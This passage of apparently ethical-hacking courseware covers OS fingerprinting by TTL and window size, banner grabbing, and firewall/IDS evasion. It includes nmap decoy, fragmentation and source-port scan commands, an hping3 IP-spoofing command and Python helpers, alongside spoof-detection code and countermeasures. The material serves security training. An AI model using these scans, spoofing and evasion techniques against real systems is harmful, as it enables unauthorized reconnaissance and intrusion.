  o Window Size: In this step, the window sizes are compared. The window size is another effective tool for determining precisely what window size is used and how often it is changed. In the previous signature, the window size is set at 0x7D78, which is the default window size used by Linux. In addition, FreeBSD and Solaris tend to maintain the same window size throughout a session. However, Cisco routers and Microsoft Windows NT window sizes constantly change. The window size is more accurate when measured after the initial three-way handshake (due to TCP slow start).
  o DF: Most systems set the DF flag, which makes it easier to identify the few systems that do not use the DF flag (such as SCO or OpenBSD).
  o TOS: TOS is also of limited value, as it seems to be more session-based than OS-based. In other words, it is not so much the OS as the protocol used that determines the TOS to a large extent.
Using the information obtained from the packet, specifically the TTL and the window size, one can compare the results with the database of signatures and determine the OS with some degree of confidence (in this case, Linux kernel 2.2.x).
Passive fingerprinting has several other uses. For example, attackers can use stealthy fingerprinting to determine the OS of a potential target such as a web server. A user only needs to request a web page from the server and then analyze the sniffer traces. This bypasses the need for using an active tool that various IDS systems can detect. Passive fingerprinting also helps in identifying remote proxy firewalls. It may be possible to ID proxy firewalls from the signatures as discussed above, simply because proxy firewalls rebuild connections for clients. Similarly, passive fingerprinting can be used to identify rogue systems.
Note: We will discuss passive banner grabbing in later modules.
Why Banner Grabbing?
An attacker uses banner grabbing to identify the OS used on the target host and thus determine the system vulnerabilities and exploits that might work on that system to carry out further attacks.
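The first banner grabbing method described above (read whatever a service volunteers when you connect, or provoke a reply when it stays quiet) fits in a few lines of Python. This is an added example and not code from the courseware: grab_banner() is the client, start_fake_service() is a constructed stand-in for a daemon on 127.0.0.1 so the example runs offline, and the banners, ports and the three regexes in software_from_banner() are assumptions chosen to resemble common FTP, SSH and HTTP responses.

```python
import re
import socket
import threading


def grab_banner(host, port, timeout=3.0, max_bytes=1024):
    """Connect to host:port and return the first bytes the service sends.
    FTP, SMTP and SSH speak first; HTTP does not, so if nothing arrives
    before the timeout we send a minimal request to provoke a reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(max_bytes)
        except socket.timeout:
            data = b""
        if not data:
            s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
            try:
                data = s.recv(max_bytes)
            except socket.timeout:
                data = b""
    return data.decode("latin-1", errors="replace").strip()


def software_from_banner(banner):
    """Pull a software/version hint out of a banner (assumed patterns)."""
    m = re.match(r"SSH-[\d.]+-(\S+)", banner)          # SSH-2.0-OpenSSH_7.9p1
    if m:
        return m.group(1)
    m = re.match(r"220[ -](.+)", banner)                # 220 (vsFTPd 3.0.3)
    if m:
        return m.group(1).strip("()")
    m = re.search(r"^Server:\s*(.+)$", banner, re.M)    # HTTP Server: header
    if m:
        return m.group(1).strip()
    return None


def start_fake_service(payload, speaks_first=True):
    """Constructed test double: listen on an ephemeral 127.0.0.1 port and
    answer exactly one connection. speaks_first=True mimics FTP/SSH (banner
    on connect); False mimics an HTTP server that waits for a request."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        if not speaks_first:
            conn.recv(1024)
        conn.sendall(payload)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    port = start_fake_service(b"220 (vsFTPd 3.0.3)\r\n")
    banner = grab_banner("127.0.0.1", port)
    print(repr(banner), "->", software_from_banner(banner))
```

Against a real host the same function is pointed at ports 21, 22, 25 or 80; the countermeasures later in this section (false banners, ServerTokens-style trimming) are exactly what makes software_from_banner() return nothing useful.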
How to Identify Target System OS
Attackers can identify the OS of a target machine by sniffing/capturing the response generated from the target machine to the request-originating machine and analyzing certain parameters/fields in it. Various protocols govern the functioning of the network; parameters in these protocols, such as Time to Live (TTL) and TCP window size in the IP header of the first packet in a TCP session, help identify the OS running on the target machine. The TTL field determines the maximum time that a packet can remain in the network, and the TCP window size determines the length of the packet reported. These values vary among OSs, as described in the following table:

Operating System                          Time To Live    TCP Window Size
Linux (Kernel 2.4 and 2.6)                64              5840
Google Linux                              64              5720
FreeBSD                                   64              65535
OpenBSD                                   64              16384
Windows 95                                32              8192
Windows 2000                              128             16384
Windows XP                                128             65535
Windows 98, Vista, and 7 (Server 2008)    128             8192
iOS 12.4 (Cisco Routers)                  255             4128
Solaris 7
AIX 4.3                                   64

Table 3.3: TTL and TCP Window Size values for OS
Attackers can use various tools to perform OS discovery on the target machine, including Wireshark, Nmap, Unicornscan, and the Nmap Script Engine. Attackers can also adopt the IPv6 fingerprinting method to grab the target OS details.
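The Spitzner analysis above and Table 3.3 describe one procedure: read TTL, window size, DF and TOS out of a captured packet, infer the sender's initial TTL (the next common value at or above the observed one), and look the pair up in the table. The following Python is an added example that carries that procedure through, not code from the paper or the courseware. It parses Snort-style records (the Spitzner record quoted above and one constructed Windows-like record), and it uses the table rows whose values are printed above; the two rows with missing values are omitted, and the "initial TTL" buckets 32/64/128/255 are an assumption the text also makes.

```python
import re

# Table 3.3 as printed (rows without values in the courseware are left out).
OS_TABLE = [
    ("Linux (Kernel 2.4 and 2.6)", 64, 5840),
    ("Google Linux", 64, 5720),
    ("FreeBSD", 64, 65535),
    ("OpenBSD", 64, 16384),
    ("Windows 95", 32, 8192),
    ("Windows 2000", 128, 16384),
    ("Windows XP", 128, 65535),
    ("Windows 98, Vista, and 7 (Server 2008)", 128, 8192),
    ("iOS 12.4 (Cisco Routers)", 255, 4128),
]

INITIAL_TTLS = (32, 64, 128, 255)


def initial_ttl(observed):
    """TTL only decreases in transit, so the sender's starting value is the
    smallest common initial TTL that is >= the observed one."""
    for t in INITIAL_TTLS:
        if observed <= t:
            return t
    raise ValueError("TTL larger than 255 is impossible")


def parse_snort_record(text):
    """Extract the four passive signatures from a Snort-style alert record."""
    ttl = int(re.search(r"TTL:(\d+)", text).group(1))
    tos = int(re.search(r"TOS:0x([0-9A-Fa-f]+)", text).group(1), 16)
    win = int(re.search(r"Win:\s*0x([0-9A-Fa-f]+)", text).group(1), 16)
    df = re.search(r"\bDF\b", text) is not None
    return {"ttl": ttl, "tos": tos, "window": win, "df": df}


def fingerprint(sig):
    """Match a signature against the table. 'exact' needs TTL class and
    window to agree; 'ttl_class' lists everything sharing the initial TTL,
    which is what the Spitzner packet (window 32120, not in the table) leaves."""
    init = initial_ttl(sig["ttl"])
    return {
        "initial_ttl": init,
        "hops": init - sig["ttl"],
        "exact": [n for n, t, w in OS_TABLE if t == init and w == sig["window"]],
        "ttl_class": [n for n, t, _ in OS_TABLE if t == init],
    }


# Record quoted in the text (Spitzner, passive fingerprinting paper).
SPITZNER_RECORD = """\
04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257 DF
***PS*A* Seq: 0x9DD90553 Ack: 0xE3C65D7 Win: 0x7D78
"""

# Constructed record (not from the paper): a Windows-like host 12 hops away.
WINDOWS_RECORD = """\
06/10-11:03:01.000000 10.10.10.10:445 -> 10.10.10.16:50111
TCP TTL:116 TOS:0x0 ID:2048 DF
***A**S* Seq: 0x1 Ack: 0x2 Win: 0x2000
"""

if __name__ == "__main__":
    for rec in (SPITZNER_RECORD, WINDOWS_RECORD):
        sig = parse_snort_record(rec)
        print(sig, "->", fingerprint(sig))
```

The Spitzner packet resolves only to the 64-TTL class (Linux, FreeBSD, OpenBSD), which is why the paper adds a traceroute and a window-size check; the constructed Windows record hits an exact row because 0x2000 (8192) is in the table.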
OS Discovery using Wireshark
Source: https://www.wireshark.org
To identify the target OS, sniff/capture the response generated from the target machine to the request-originating machine using a packet-sniffing tool such as Wireshark, and observe the TTL and TCP window size fields in the first captured TCP packet. By comparing these values with those in the above table, you can determine the target OS that generated the response.
Figure 3.77: Wireshark screenshot showing TTL value (Possible OS is Windows)
Figure 3.78: Wireshark screenshot showing TTL value (Possible OS is ...)
OS Discovery using Nmap and Unicornscan
OS Discovery using Nmap
Source: https://nmap.org
To exploit the target, it is essential to identify the OS running on the target machine. Attackers can employ various tools to acquire the OS details of the target. Nmap is one of the effective tools for performing OS discovery activities. In Zenmap, the -O option is used to perform OS discovery, which displays the OS details of the target machine.
Figure 3.79: OS Discovery using Zenmap
OS Discovery using Unicornscan
Source: https://sourceforge.net
In Unicornscan, the OS of the target machine can be identified by observing the TTL values in the acquired scan result. To perform a Unicornscan, the syntax "unicornscan <target IP address>" is used. As shown in the screenshot, the ttl value acquired in the scan result indicates that the possible OS is Windows.
Figure 3.80: OS Discovery using Unicornscan
OS Discovery using Nmap Script Engine
Source: https://nmap.org
The Nmap Scripting Engine (NSE) in Nmap can be used to automate a wide variety of networking tasks by allowing users to write and share scripts. These scripts can be executed in parallel with the same efficiency and speed as Nmap. Attackers can also use various scripts in the Nmap Script Engine for performing OS discovery on the target machine. For example, in Nmap, smb-os-discovery is an inbuilt script used for collecting OS information on the target machine through the SMB protocol. In Zenmap, the -sC option or the --script option is used to run the scripts.
[Screenshot: Zenmap running "nmap --script smb-os-discovery.nse 10.10.10.10" (Nmap 7.70, 2019-06-10). Host script results: smb-os-discovery reports OS: Windows 10 Enterprise 17763, the NetBIOS computer name of the target, and its system time.]
Figure 3.81: OS Discovery using Nmap Script Engine
OS Discovery using IPv6 Fingerprinting
Source: https://nmap.org
IPv6 fingerprinting is another technique used to identify the OS running on the target machine. It has the same functionality as IPv4 fingerprinting, such as sending probes, waiting for and collecting the responses, and matching them with the database of fingerprints. The difference between IPv6 and IPv4 fingerprinting is that IPv6 uses several additional advanced IPv6-specific probes along with a separate IPv6-specific OS detection engine. Nmap sends nearly 18 probes in the following order to identify the target OS using the IPv6 fingerprinting method:
- Sequence generation (S1-S6)
- ICMPv6 echo (IE1)
- ICMPv6 echo (IE2)
- Node Information Query (NI)
- Neighbor Solicitation (NS)
- UDP (U1)
- TCP explicit congestion notification (TECN)
- TCP (T2-T7)
In Zenmap, the -6 option along with the -O option is used to perform OS discovery using the IPv6 fingerprinting method.
Syntax:
# nmap -6 -O <target>
Banner Grabbing Countermeasures
- Disabling or Changing Banner
Whenever a port is open, it implies that a service/banner is running on it. When attackers connect to the open port using banner grabbing techniques, the system presents a banner containing sensitive information such as the OS, server type, and version. Using the information gathered, the attacker identifies specific vulnerabilities to exploit and then launches attacks. The countermeasures against banner grabbing attacks are as follows:
  o Display false banners to mislead or deceive attackers
  o Apache 2.x with the mod_headers module: use a directive in the httpd.conf file to change the banner information
- Hiding File Extensions from Web Pages
File extensions reveal information about the underlying server technology that an attacker can use to launch attacks. The countermeasures against such banner grabbing attacks are as follows:
  o Hide file extensions to mask the web technology.
  o Replace application mappings such as .asp with .htm or .foo, etc., to disguise the identity of the servers.
  o Apache users can use mod_negotiation directives.
Module Flow: Scanning Beyond IDS and Firewall
IDS/Firewall Evasion Techniques
Although firewalls and IDS can prevent malicious traffic (packets) from entering a network, attackers can send intended packets to the target that evade the IDS/firewall by implementing the following techniques:
- Packet Fragmentation: The attacker sends fragmented probe packets to the intended target, which reassembles the fragments after receiving all of them.
- Source Routing: The attacker specifies the routing path for the malformed packet to reach the intended target.
- IP Address Decoy: The attacker generates or manually specifies IP addresses of decoys so that the IDS/firewall cannot determine the actual IP address.
- IP Address Spoofing: The attacker changes the source IP addresses so that the attack appears to be coming from someone else.
- Creating Custom Packets: The attacker sends custom packets to scan the intended target beyond the firewalls.
- Randomizing Host Order: The attacker scans the hosts in the target network in a random order to scan the intended target that lies beyond the firewall.
- Sending Bad Checksums: The attacker sends packets with bad or bogus TCP/UDP checksums to the intended target.
- Proxy Servers: The attacker uses a chain of proxy servers to hide the actual source of a scan and evade certain IDS/firewall restrictions.
- Anonymizers: The attacker uses anonymizers, which allow them to bypass Internet censors and evade certain IDS and firewall rules.
Packet Fragmentation
Packet fragmentation refers to the splitting of a probe packet into several smaller packets (fragments) while sending it to a network. When these packets reach a host, the IDS and firewalls in front of the host generally queue all of them and process them one by one. However, since this method of processing involves greater CPU and network resource consumption, the configuration of most IDS causes them to skip fragmented packets during port scans. Therefore, attackers use packet fragmentation tools such as Nmap and fragroute to split the probe packet into smaller packets that circumvent the port-scanning detection techniques employed by IDS. Once these fragments reach the destined host, they are reassembled to form a single packet.

SYN/FIN Scanning Using IP Fragments
This process of scanning using IP fragments is not a new scanning method but a modification of previous scanning techniques. It was developed to avoid the false positives generated by other scans because of a packet filtering device on the target. The TCP header is split into several packets to evade the packet filter. For any transmission, the initial fragment must carry the source and destination ports of the TCP header (8 octets, 64 bits). The flags then arrive in the next fragment, and the remote host reassembles the packets upon receipt via an Internet protocol module that detects fragmented data packets using the matching source, destination, protocol, and identification fields.

Figure 3.82: SYN/FIN scanning (the attacker sends SYN/FIN probes to port n as small fragments; the target answers RST if the port is closed)

In this scan, the system splits the TCP header into several IP fragments and transmits them over the network. However, IP reassembly on the server side may result in unpredictable and abnormal results, such as fragmentation of the IP header data. Some hosts may fail to parse and reassemble the fragmented packets, which may lead to crashes, reboots, or even network device monitoring dumps.

[Screenshot: "nmap -f -v 10.10.10.10" (Nmap 7.70, 2019-06-10 11:03 EDT) with "Discovered open port ..." lines in the verbose output.]
Figure 3.83: SYN/FIN scan using Nmap
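To make the mechanism above concrete, the following Python is an added example (not the courseware's code and not how Nmap or fragroute are implemented): it builds a 20-byte TCP header with SYN and FIN set, cuts it into IP fragments of 8 bytes the way nmap -f does (offsets are counted in 8-byte units, MF set on all but the last), shows that the ports land in the first fragment while the flags byte (offset 13 of the TCP header) lands in the second, and reassembles the pieces keyed on the (src, dst, protocol, id) tuple the text mentions. The addresses and IP id are constructed; the fragments are dicts standing in for IP headers rather than real packets on the wire.

```python
import struct
from collections import defaultdict

FIN, SYN, RST, PSH, ACK, URG = 1, 2, 4, 8, 16, 32


def tcp_header(sport, dport, flags, seq=0, ack=0, window=1024):
    """Minimal 20-byte TCP header (data offset 5 words, no options)."""
    offset_flags = (5 << 12) | flags
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                       offset_flags, window, 0, 0)  # checksum, urgent ptr


def fragment(payload, ident, src, dst, proto=6, frag_size=8):
    """Split `payload` into IP fragments of `frag_size` bytes (multiple of 8).
    Each dict mimics the IP header fields a filter or host sees."""
    assert frag_size % 8 == 0, "fragment offsets are in 8-byte units"
    frags = []
    for off in range(0, len(payload), frag_size):
        chunk = payload[off:off + frag_size]
        frags.append({
            "src": src, "dst": dst, "proto": proto, "id": ident,
            "offset": off // 8,                    # in 8-byte units
            "mf": off + frag_size < len(payload),  # More Fragments flag
            "data": chunk,
        })
    return frags


def carries_tcp_flags(frag):
    """A stateless filter matching on SYN/FIN only sees them in the fragment
    that contains byte 13 of the TCP header."""
    start = frag["offset"] * 8
    return start <= 13 < start + len(frag["data"])


def reassemble(frags):
    """Host-side reassembly: group by (src, dst, proto, id), put fragments
    in offset order, and return the payload only if it is contiguous and
    ends with a fragment whose MF bit is clear; otherwise None."""
    groups = defaultdict(list)
    for f in frags:
        groups[(f["src"], f["dst"], f["proto"], f["id"])].append(f)
    result = {}
    for key, parts in groups.items():
        parts.sort(key=lambda f: f["offset"])
        buf, expected, complete = b"", 0, False
        for p in parts:
            if p["offset"] * 8 != expected:
                break                              # gap: still waiting
            buf += p["data"]
            expected += len(p["data"])
            if not p["mf"]:
                complete = True
                break
        result[key] = buf if complete else None
    return result


if __name__ == "__main__":
    hdr = tcp_header(40000, 80, SYN | FIN)
    frags = fragment(hdr, 0x1234, "10.10.10.16", "10.10.10.10")
    for f in frags:
        print(f["offset"], f["mf"], f["data"].hex(), "flags here" if carries_tcp_flags(f) else "")
    print(reassemble(frags))
```

The point a filter author should take from this: a device that inspects each fragment on its own sees a first fragment with ports but no flags, and later fragments with no ports at all, so it cannot apply a SYN/FIN rule unless it reassembles (or simply drops tiny first fragments) before filtering.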
Source Routing
An IP datagram contains various fields, including the IP options field, which stores source routing information and includes a list of IP addresses through which the packet travels to its destination. As the packet travels through the nodes in the network, each router examines the destination IP address and chooses the next hop to direct the packet to the destination. When attackers send malformed packets to a target, these packets hop through various routers and gateways to reach the destination. In some cases, the routers in the path might include configured firewalls and IDS that block such packets. To avoid them, attackers enforce a loose or strict source routing mechanism, in which they manipulate the IP address path in the IP options field so that the packet takes the attacker-defined path (without firewall-/IDS-configured routers) to reach the destination, thereby evading firewalls and IDS.
The figure below shows source routing, where the originator dictates the eventual route of the traffic.
Figure 3.84: Source Routing
In practice, most current routers and host stacks discard source-routed packets by default (for example, Cisco IOS with "no ip source-route", and Linux with the accept_source_route sysctl set to 0), so this technique mainly works against legacy equipment; the countermeasure is simply to verify that the default is still in place.
Source Port Manipulation
Source port manipulation is a technique used for bypassing the IDS/firewall, where the actual source port numbers are replaced with common port numbers to evade certain IDS and firewall rules. The main security misconfiguration occurs because of blindly trusting the source port number. Administrators often configure the firewall to allow incoming traffic from well-known ports such as HTTP, DNS, FTP, etc. The firewall then simply allows the incoming traffic of packets that the attacker sends from such common ports.
Figure 3.85: Firewall allowing manipulated port 80 to the victim from the attacker
Although firewalls can be made secure using application-level proxies or protocol-parsing firewall elements, this technique helps the attacker bypass naive firewall rules easily. The attacker tries to replace the original source port number with a common port number, which can easily bypass the IDS/firewall. In Zenmap, the -g or --source-port option is used to perform source port manipulation.
[Screenshot: Zenmap running "nmap -g 80 10.10.10.10" (Nmap 7.70, 2019-06-27). Host is up (0.005s latency). Not shown: 997 filtered ports. 5357/tcp open wsdapi. Nmap done: 1 IP address (1 host up) scanned in 5.26 seconds.]
Figure 3.86: Scanning over firewall using Nmap
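The misconfiguration described above, and the fix the text hints at (make the decision on connection state rather than on the source port), can be shown side by side. The following Python is an added example, not code from the courseware or from any firewall product: a stateless rule that trusts source ports 53 and 80, and a minimal stateful filter that admits an inbound packet only if an inside host opened that connection. The hosts, ports and the "nmap -g 80" probe are constructed; 203.0.113.5 is a documentation address standing in for an external web server.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # TCP flags as letters, e.g. "S", "SA", "A"


# Misconfigured stateless rule: "traffic from DNS/HTTP source ports is a reply, let it in".
TRUSTED_SOURCE_PORTS = {53, 80}


def stateless_allow(pkt):
    return pkt.sport in TRUSTED_SOURCE_PORTS


class StatefulFilter:
    """Admits inbound packets only for connections an inside host initiated."""

    def __init__(self):
        self.table = set()  # (inside_ip, inside_port, outside_ip, outside_port)

    def outbound(self, pkt):
        # a bare SYN leaving the network creates a connection entry
        if "S" in pkt.flags and "A" not in pkt.flags:
            self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))

    def inbound_allow(self, pkt):
        return (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.table


ATTACKER, VICTIM, WEB = "10.10.10.16", "10.10.10.10", "203.0.113.5"

# What "nmap -g 80 10.10.10.10" emits: a SYN probe whose source port is forced to 80.
scan_probe = Packet(ATTACKER, 80, VICTIM, 5357, "S")
# A legitimate flow: the victim opens a connection to a web server, reply comes back from port 80.
client_syn = Packet(VICTIM, 51000, WEB, 80, "S")
server_synack = Packet(WEB, 80, VICTIM, 51000, "SA")


def evaluate():
    """Run both policies over the same two inbound packets."""
    fw = StatefulFilter()
    fw.outbound(client_syn)
    return {
        "stateless_lets_scan_in": stateless_allow(scan_probe),
        "stateless_lets_reply_in": stateless_allow(server_synack),
        "stateful_lets_scan_in": fw.inbound_allow(scan_probe),
        "stateful_lets_reply_in": fw.inbound_allow(server_synack),
    }


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name}: {verdict}")
```

The stateless policy cannot tell the forged probe from the genuine reply because both carry source port 80; the stateful one admits the reply and drops the probe without ever looking at the source port, which is why the countermeasure earlier in this module is "ensure the filtering mechanism cannot be bypassed using a particular source port".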
IP Address Decoy
The IP address decoy technique refers to generating or manually specifying IP addresses of decoys to evade IDS/firewalls. It appears to the target that the decoys as well as the real host are scanning the network. This technique makes it difficult for the IDS/firewall to determine which IP address is actually scanning the network and which IP addresses are decoys.
The Nmap scanning tool comes with a built-in scan function called a decoy scan, which cloaks a scan with decoys. This technique generates multiple IP addresses to perform a scan, thus making it difficult for the target security mechanisms such as IDS, firewalls, etc., to identify the original source from the registered logs. The target IDS might report scanning from 5-10 IP addresses; however, it cannot differentiate between the actual scanning IP address and the innocuous decoy IPs.
You can perform two types of decoy scans using Nmap:
- nmap -D RND:10 [target]
Using this command, Nmap generates the given number of random decoy addresses (here 10) for the scan and positions the real IP address at a random place among the decoy IPs. Ex. Assume that 10.10.10.10 is the target IP address to be scanned. Thus, the Nmap decoy scan command will be:
# nmap -D RND:10 10.10.10.10
[Screenshot: Zenmap running "nmap -D RND:10 10.10.10.10" (Nmap 7.70, 2019-06-27 12:44). Not shown: 997 filtered ports. MAC Address: 00:0C:29:02:96:44 (VMware).]
Figure 3.87: RND decoy using Nmap
- nmap -D decoy1,decoy2,decoy3,...,ME,... [target]
Using this command, you can manually specify the IP addresses of the decoys to scan the victim's network. Here, you have to separate each decoy IP with a comma (,), and you can optionally use the ME keyword to position your real IP in the decoy list. If you place ME in the 4th position of the command, your real IP will be positioned at the 4th position accordingly. This is optional; if you do not mention ME in your scan command, then Nmap will automatically place your real IP at a random position.
For example, assume that 10.10.10.16 is the real source IP and 10.10.10.10 is the target IP address to be scanned. Then, the Nmap decoy command will be:
Syntax
# nmap -D 192.168.0.1,172.120.2.8,192.168.2.8,10.10.10.16,10.10.10.5 10.10.10.10
[Screenshot: Zenmap running "nmap -D 192.168.0.1,172.120.2.8,192.168.2.8,10.10.10.16,10.10.10.5 10.10.10.10" (Nmap 7.70, 2019-06-27 12:46). 5357/tcp open wsdapi. MAC Address: 00:0C:29:02:96:44 (VMware).]
Figure 3.88: Decoy using Nmap with manual list

These decoys can be generated both in the initial ping scans (ICMP, SYN, ACK, etc.) and during the actual port scanning phase. The decoy IP address technique is useful for hiding your IP address. However, it will not be successful if the target employs active mechanisms such as router path tracing, response dropping, etc. Moreover, using many decoys can slow down the scanning process and affect the accuracy of the scan.
IP Address Spoofing
Most firewalls filter packets based on the source IP address. These firewalls examine the source IP address and determine whether the packet is coming from a legitimate source or an illegitimate source. The IDS filters packets from illegitimate sources. Attackers use the IP spoofing technique to bypass such IDS/firewalls.
IP address spoofing is a hijacking technique in which an attacker obtains a computer's IP address, alters the packet headers, and sends request packets to a target machine, pretending to be a legitimate host. The packets appear to be sent from a legitimate machine but are actually sent from the attacker's machine, while the attacker's own IP address is concealed. When the victim replies to the address, the reply goes back to the spoofed address and not to the attacker's real address. Attackers mostly use IP address spoofing to perform DoS attacks.

IP spoofing using Hping3:
# hping3 www.certifiedhacker.com -a 7.7.7.7
Figure 3.89: IP Spoofing using Hping3
You can use Hping3 to perform IP spoofing. The above command sends packets to the named host with the spoofed source address 7.7.7.7; Hping3 lets you send arbitrary TCP/IP packets to network hosts.
Note: You will not be able to complete the three-way handshake and open a successful TCP connection with spoofed IP addresses.
IP Spoofing Detection Techniques

Direct TTL Probes

In this technique, you initially send a packet (ping request) to the host and wait for a reply. Check whether the TTL value in the reply matches that of the packet you are checking. Both will have the same TTL if they are using the same protocol. Although the initial TTL values vary according to the protocol used, a few initial TTL values are commonly used. For TCP/UDP, the values are 64 and 128; for ICMP, they are 128 and 255.

Figure 3.90: IP Spoofing detection techniques: Direct TTL Probes

If the reply is from a different protocol, then you should check the actual hop count to detect the spoofed packets. Deduct the TTL value in the reply from the initial TTL value to determine the hop count. The packet is a spoofed packet if the TTL in the reply does not match the TTL of the packet. It will be very easy to launch an attack if the attacker knows the hop count between the source and the host. In this case, the test result is a false negative.
This technique is successful when the attacker is in a different subnet from that of the victim.

Note: Normal traffic from one host can contrast TTLs depending on traffic patterns.
IP Identification Number

Users can identify spoofed packets by monitoring the IP identification (IPID) number in the IP packet headers. The IPID increases incrementally each time a system sends a packet. Every IP packet on the network has a "fragment identification" number, which is increased by one for every packet transmission. To identify whether a packet is spoofed, send a probe packet to the source IP address of the packet and observe the IPID number in the reply. The IPID value in the response packet must be close to but slightly greater than the IPID value of the probe packet. The source address of the IP packet is spoofed if the IPID of the response packet is not close to that of the probe packet.
Figure 3.91: IP Spoofing detection technique: IP Identification Number

TCP Flow Control Method
Most spoofing attacks occur during the handshake, as it is challenging to build multiple spoofed replies with the correct sequence number. Therefore, apply the flow control spoofed packet detection method to the handshake. In a TCP handshake, the host sending the initial SYN packet waits for SYN-ACK before sending the ACK packet.

To check whether you are getting the SYN request from a genuine client or a spoofed one, set the window size in the SYN-ACK to zero. If the sender sends an ACK packet with any data, it means that the sender is a spoofed one. This is because when the SYN-ACK window is set to zero, the sender must respond to it only with the ACK packet, without additional data.
Figure 3.92: IP Spoofing detection technique: TCP Flow Control Method
Attackers sending spoofed TCP packets will not receive the target's SYN-ACK packets. Attackers cannot respond to changes in the congestion window size. When the received traffic continues after a window size is exhausted, the packets are most likely spoofed.
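The two checks described above, Direct TTL Probes and IP Identification Number, expressed as code and run over constructed sample values. This is an added example and is not code from the courseware; the initial-TTL table is the one the text gives, while the IPID proximity window (max_gap) and the choice of comparing the suspect packet's IPID with the IPID of the probe reply are assumptions made for illustration.

```python
"""Spoof-detection heuristics from the text above, applied to constructed samples.

Added example, not code from the CEH courseware. The initial-TTL table is the
one the text gives (TCP/UDP: 64 or 128; ICMP: 128 or 255); the IPID "closeness"
window (max_gap) is an assumption chosen for illustration.
"""

# Commonly used initial TTL values per protocol, as listed in the text.
COMMON_INITIAL_TTLS = {"tcp": (64, 128), "udp": (64, 128), "icmp": (128, 255)}


def infer_initial_ttl(observed_ttl, protocol):
    """Smallest common initial TTL for the protocol that is >= the observed TTL,
    or None when the observed value fits no common starting point."""
    candidates = [t for t in COMMON_INITIAL_TTLS[protocol.lower()] if t >= observed_ttl]
    return min(candidates) if candidates else None


def hop_count(observed_ttl, protocol):
    """Hop count = initial TTL - TTL seen in the packet (None if not inferable)."""
    initial = infer_initial_ttl(observed_ttl, protocol)
    return None if initial is None else initial - observed_ttl


def direct_ttl_probe_check(suspect_ttl, suspect_proto, reply_ttl, reply_proto):
    """Direct TTL probe: compare the suspect packet's TTL with the TTL of the
    reply to a probe sent to the claimed source. Same protocol: the TTLs must
    match. Different protocols: compare the inferred hop counts instead."""
    if suspect_proto.lower() == reply_proto.lower():
        return "consistent" if suspect_ttl == reply_ttl else "suspicious"
    suspect_hops = hop_count(suspect_ttl, suspect_proto)
    reply_hops = hop_count(reply_ttl, reply_proto)
    if suspect_hops is None or reply_hops is None:
        return "unknown"
    return "consistent" if suspect_hops == reply_hops else "suspicious"


def ipid_check(reference_ipid, reply_ipid, max_gap=50):
    """IP Identification Number check: the IPID in the reply to the probe must be
    close to, but greater than, the reference IPID. The 16-bit field wraps, so
    the difference is taken modulo 65536. max_gap is an assumed threshold."""
    gap = (reply_ipid - reference_ipid) % 65536
    return "consistent" if 1 <= gap <= max_gap else "suspicious"


if __name__ == "__main__":
    # Constructed samples: a TCP packet with TTL 54 and an ICMP probe reply with
    # TTL 118 both sit 10 hops away, so the cross-protocol comparison passes.
    print(direct_ttl_probe_check(54, "tcp", 118, "icmp"))   # consistent
    # A TCP packet with TTL 120 (8 hops) versus a reply 10 hops away is inconsistent.
    print(direct_ttl_probe_check(120, "tcp", 118, "icmp"))  # suspicious
    print(ipid_check(1000, 1003))    # consistent
    print(ipid_check(1000, 4000))    # suspicious
    print(ipid_check(65535, 2))      # consistent (counter wrapped around)
```

A "suspicious" verdict is a lead rather than proof: as the text notes, the TTL test yields a false negative when the attacker matches the hop count, and normal traffic from one host can vary in TTL with traffic patterns, so both checks are best used together and confirmed against other evidence.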
IP Spoofing Countermeasures (slide)
Slide notes: use multiple firewalls to provide a multilayered depth of protection; do not rely on IP-based authentication; use random initial sequence numbers to prevent IP spoofing attacks based on sequence number spoofing; ingress filtering: use routers and firewalls at your network perimeter to filter incoming packets that appear ...
IP Spoofing Countermeasures

In ethical hacking, the ethical hacker, also known as a "pen tester," has an additional task to perform that a normal hacker does not follow (i.e., adopting countermeasures against the respective vulnerabilities determined in your network through hacking). This is essential because knowing security loopholes is worthless unless you adopt measures to protect them against real hackers. As mentioned previously, IP spoofing is one of the techniques that a hacker adopts to break into the target network. Therefore, to protect your network from external hackers, you should apply IP spoofing countermeasures to your network security settings. Some IP spoofing countermeasures that you can apply are as follows:
Avoid trust relationships

Do not rely on IP-based authentication. Attackers may spoof themselves as trusted hosts and send malicious packets to you. If you accept these packets under the assumption that they are "clean" because they are from your trusted host, the malicious code will infect your system. Therefore, it is advisable to test all packets, even when they come from one of your trusted hosts. You can avoid this problem by implementing password authentication along with trust-relationship-based authentication.
Use firewalls and filtering mechanisms

As stated above, you should filter all the incoming and outgoing packets to avoid attacks and sensitive information loss. A firewall can restrict malicious packets from entering your private network and prevent severe data loss. You can use access control lists (ACLs) to block unauthorized access. At the same time, there is a possibility of an insider attack. Inside attackers can send sensitive information about your business to your competitors, which could lead to monetary loss and other issues. Another risk of outgoing packets is that an attacker will succeed in installing a malicious sniffing program running in a hidden mode on your network. These programs gather and send all your network information to the attacker without any notification after filtering the outgoing packets. Therefore, you should assign the same importance to the scanning of outgoing packets as you would to that of incoming packets.
Use random initial sequence numbers

Most devices choose their ISN based on timed counters. This makes the ISNs predictable, as it is easy for an attacker to determine the concept of generating the ISN. The attacker can determine the ISN of the next TCP connection by analyzing the ISN of the current session or connection. If the attacker can predict the ISN, then he/she can establish a malicious connection to the server and sniff out your network traffic. To avoid this risk, use random initial sequence numbers.
Ingress filtering

Ingress filtering prevents spoofed traffic from entering the Internet. It is applied to routers because it enhances the functionality of the routers and blocks spoofed traffic. Configuring and using ACLs that drop packets with a source address outside the defined range is one method of implementing ingress filtering.

Egress filtering

Egress filtering refers to a practice that aims to prevent IP spoofing by blocking outgoing packets with a source address that is not inside.
